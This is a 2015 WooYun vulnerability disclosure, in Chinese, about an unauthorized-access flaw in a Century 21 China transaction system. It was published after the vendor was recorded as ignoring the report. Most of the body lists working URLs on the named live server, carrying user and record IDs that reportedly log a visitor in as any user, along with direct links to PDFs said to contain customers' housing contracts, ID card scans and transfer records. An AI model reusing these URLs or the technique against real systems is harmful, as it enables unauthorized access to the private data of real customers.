当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132219

漏洞标题:21世纪不动产某处未授权访问漏洞(登录任意用户,涉及客户敏感信息,房屋合同,身份证原件,转账记录)

相关厂商:21世纪不动产

漏洞作者: 0x 80

提交时间:2015-08-07 10:38

修复时间:2015-09-21 10:40

公开时间:2015-09-21 10:40

漏洞类型:应用配置错误

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-09-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

21世纪不动产某处未授权访问漏洞(登录任意用户,涉及客户敏感信息,房屋合同,身份证原件,转账记录)

详细说明:

http://tmsbj.century21cn.com:8010/Login.aspx
需要登录
直接访问
http://tmsbj.century21cn.com:8010/instancedetail.aspx?instanceid=b11e032f-f225-4f59-9649-0509942658be&expandpath=&&pageaction=close&emp_cd=bj40458
即可记忆当前emp_cd=参数这个用户

56721.png


http://tmsbj.century21cn.com:8010/TPM/CommissionConfirm/CommissionConfirmForm.aspx?Mode=View&WorkItemID=c98aa58e-b1af-4357-9387-216ee3b4b5d8&LoginName=&LoginPassword=

765.png


http://tmsbj.century21cn.com:8010/EditUser.aspx?Mode=View&ID=aeaf2788-ef5e-4b4f-9a1d-32522ce98859&ExpandPath=&&PageAction=Close
直接自动登录

32.png


3456.png


这里打开即可登录任意用户
http://tmsbj.century21cn.com:8010/EditUser.aspx?Mode=View&ID=67d833ab-1395-4a78-b066-fc785cad256e&ExpandPath=&&PageAction=Close

2344.png


435.png


67.png


敏感信息泄漏
http://tmsbj.century21cn.com:8010/UploadFile/2014-05/BJB2663140505/80b3a2f8-33ae-4b21-b16c-b8708eabf679.pdf

456.png


672.png


685.png


79.png


95.png


768.png


673.png


http://tmsbj.century21cn.com:8010/uploadfile/2014-01/bjb306140102/ee3e4047-b12d-4c90-9874-40ff17a7f964.pdf

65.png


6789.png


90.png


漏洞证明:

http://tmsbj.century21cn.com:8010/InstanceDetail.aspx?InstanceId=b11e032f-f225-4f59-9649-0509942658be&&PageAction=Close


http://tmsbj.century21cn.com:8010/InstanceDetail.aspx?InstanceId=cf2013e1-37d9-4dde-9094-ec47538b7e5b&ExpandPath=&&PageAction=Close&emp_cd=BJ33772


http://tmsbj.century21cn.com:8010/uploadfile/2014-01/bjb306140101/fdb979d9-fffe-4579-a1d5-28ab80a14688.pdf

修复方案:

版权声明:转载请注明来源 0x 80@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)